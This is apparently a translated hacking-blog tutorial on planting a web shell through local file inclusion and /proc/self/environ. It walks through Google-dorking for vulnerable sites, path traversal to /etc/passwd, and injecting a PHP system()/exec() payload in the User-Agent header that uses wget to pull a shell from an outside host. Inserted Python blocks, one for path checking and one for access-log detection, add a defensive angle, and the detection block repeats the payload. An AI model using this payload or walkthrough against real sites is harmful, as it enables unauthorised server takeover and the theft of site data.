
How to Plant a Shell via LFI (Local File Inclusion) Using the /proc/self/environ Method

After yesterday's post about a Bappeda site vulnerable to LFI, this time, as promised, I'll share how to plant a shell via LFI (Local File Inclusion) using the /proc/self/environ method.

--| Intro |--

Local File Inclusion is like a hole in a site that you can use to access any file on the webserver with nothing but a browser. "Seriously?" Don't believe me? Check this shit out.

--| Reff |--

1. Find a website vulnerable to LFI.

example: http://site.com/info.php?file=news.php

How do you find one? Just dork it with a keyword like "inurl:whatever.php?file=contoh.php"

Replace whatever.php and contoh.php with PHP files commonly used on websites, like news.php, info.php, article.php, index.php, etc.



2. Now replace "news.php" with "../../../".

example: http://site.com/info.php?file=../../../

We get an error like the following...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

OK, it looks like we have a chance to make it include another file.

Next, let's try to find /etc/passwd.

example: http://site.com/info.php?file=etc/passwd

But we still get an error like this:

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

What if we go up more directories?

Let's try...

example: http://site.com/info.php?file=../../../../../../../../../etc/passwd



Ahoy, we got the /etc/passwd file, which looks like this:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
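The reason piling on more ../ eventually works in step 2 is that path normalization silently drops every .. that would climb above /, so an include() that trusts ?file= can be steered to any file the web server user can read no matter how deep the document root is. The Python below is an added example, not code from the post: it resolves the exact values tried above the way include() in /home/gunslinger/public_html/info.php would see them, then shows the two checks a fix needs, a containment check against the document root and a fixed allowlist of page names. DOC_ROOT is taken from the error message on the page; ALLOWED_PAGES is a hypothetical allowlist.

```python
import posixpath

# Document root taken from the error message shown in step 2 of the post.
DOC_ROOT = "/home/gunslinger/public_html"

# Hypothetical allowlist of pages info.php is meant to include (not from the post).
ALLOWED_PAGES = {"news.php", "info.php", "article.php", "index.php"}


def resolve(doc_root, user_value):
    """Resolve the ?file= value the way include() in doc_root/info.php would see it.

    posixpath.normpath collapses '..' segments and discards any that would climb
    above '/', so nine '../' and ninety '../' both land on /etc/passwd. That is
    why 'going up more directories' in step 2 eventually succeeds.
    """
    if user_value.startswith("/"):
        candidate = user_value
    else:
        candidate = posixpath.join(doc_root, user_value)
    return posixpath.normpath(candidate)


def escapes_root(doc_root, user_value):
    """True when the resolved path lies outside the document root."""
    root = posixpath.normpath(doc_root)
    resolved = resolve(doc_root, user_value)
    return resolved != root and not resolved.startswith(root + "/")


def safe_include(doc_root, user_value, allowed=ALLOWED_PAGES):
    """Mitigation: only ever include a bare name taken from a fixed allowlist.

    Returns the absolute path to include, or None when the request is refused.
    Containment alone is not a sufficient fix: files under the web root
    (config backups, upload directories) are still sensitive, so the allowlist
    is the check that actually closes the hole.
    """
    if user_value not in allowed:
        return None
    return posixpath.join(doc_root, user_value)


if __name__ == "__main__":
    for value in ("news.php", "../../../", "etc/passwd",
                  "../../../../../../../../../etc/passwd",
                  "../../../../../../../../../proc/self/environ"):
        print(f"{value!r:48} -> {resolve(DOC_ROOT, value)}"
              f"  escapes_root={escapes_root(DOC_ROOT, value)}"
              f"  include={safe_include(DOC_ROOT, value)}")
```

Run it and the three tries from step 2 map to /, /home/gunslinger/public_html/etc/passwd and /etc/passwd respectively, which is exactly the sequence of errors and the final success the post shows.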



3. Let's check whether /proc/self/environ is accessible.

Now replace "/etc/passwd" with "/proc/self/environ".

example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ

If you get something like this:



DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80



So /proc/self/environ is accessible!

If you get a blank page, /proc/self/environ can't be accessed, or the server may be running a *BSD operating system.



4. Now let's inject malicious code by poisoning the HTTP headers. How do we inject it? We can use the Tamper Data Firefox add-on.

You can download it here: https://addons.mozilla.org/en-US/firefox/addon/966

Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before: "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"

Then in the User-Agent field enter the following code:

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

or

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

Then submit.

5. If the malicious code injection succeeds, the shell will be at a location like this:

http://www.site.com/shell.php
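From the defender's side, every step above leaves a trace in the web server's access log: a traversal sequence in the query string, a request for /proc/self/environ or /etc/passwd, and a User-Agent carrying PHP tags and a system()/exec() call. The script below is an added example, not part of the original post; the log lines are constructed in Apache combined format (the client IP and timestamps are made up, the requests and the User-Agent payload mirror the ones shown above), and the four rules are assumptions about what a reviewer would flag, not a published ruleset.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log. The client IP and timestamps are
# made up; the request paths and User-Agent payload mirror what the post shows.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Nov/2009:10:01:02 +0700] "GET /info.php?file=news.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.9.0.15) Gecko/2009102815 Firefox/3.0.15"
10.0.0.5 - - [15/Nov/2009:10:01:30 +0700] "GET /info.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.9.0.15) Gecko/2009102815 Firefox/3.0.15"
10.0.0.5 - - [15/Nov/2009:10:02:11 +0700] "GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1402 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.9.0.15) Gecko/2009102815 Firefox/3.0.15"
10.0.0.5 - - [15/Nov/2009:10:03:45 +0700] "GET /info.php?file=../../../../../../../../../proc/self/environ HTTP/1.1" 200 1402 "-" "<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>"
10.0.0.5 - - [15/Nov/2009:10:04:02 +0700] "GET /shell.php HTTP/1.1" 200 35210 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.9.0.15) Gecko/2009102815 Firefox/3.0.15"
"""

# Apache combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                       # ../ or ..\ anywhere in the request
SENSITIVE_RE = re.compile(r'/proc/self/environ|/etc/passwd', re.I)
PHP_TAG_RE = re.compile(r'<\?.*\?>', re.S)                    # PHP open/close tags in a header
EXEC_RE = re.compile(r'\b(system|exec|shell_exec|passthru)\s*\(')


def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so ..%2F and ..%252F look alike."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target, ua):
    """Return the sorted list of rule names a request trips (empty when clean)."""
    path = decode(target)
    tags = []
    if TRAVERSAL_RE.search(path):
        tags.append("traversal")
    if SENSITIVE_RE.search(path):
        tags.append("sensitive_file")
    if PHP_TAG_RE.search(ua):
        tags.append("php_tag_in_ua")
    if EXEC_RE.search(ua):
        tags.append("exec_call_in_ua")
    return sorted(tags)


def analyze(log_text):
    """Parse combined-format lines and return the flagged ones with their tags."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these too
        tags = classify(m["target"], m["ua"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["target"]} -> {", ".join(hit["tags"])}')
```

Two points worth noting when turning this into a real alert. The decode step matters because the same traversal shows up both raw (step 2) and percent-encoded (the QUERY_STRING in the environ dump), and a rule that only looks at the raw line misses half of it. And the last sample line, a 200 for shell.php right after the poisoned User-Agent, carries no tag on its own: the high-confidence signal is the sequence from one client, an environ read followed by a hit on a PHP file that did not exist before, so a stateful rule keyed on the client address is the natural next step.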



6. OK, that's it, my mom's calling me, says she wants a kerokan, bye... use at your own risk @_@

-|Endtro|-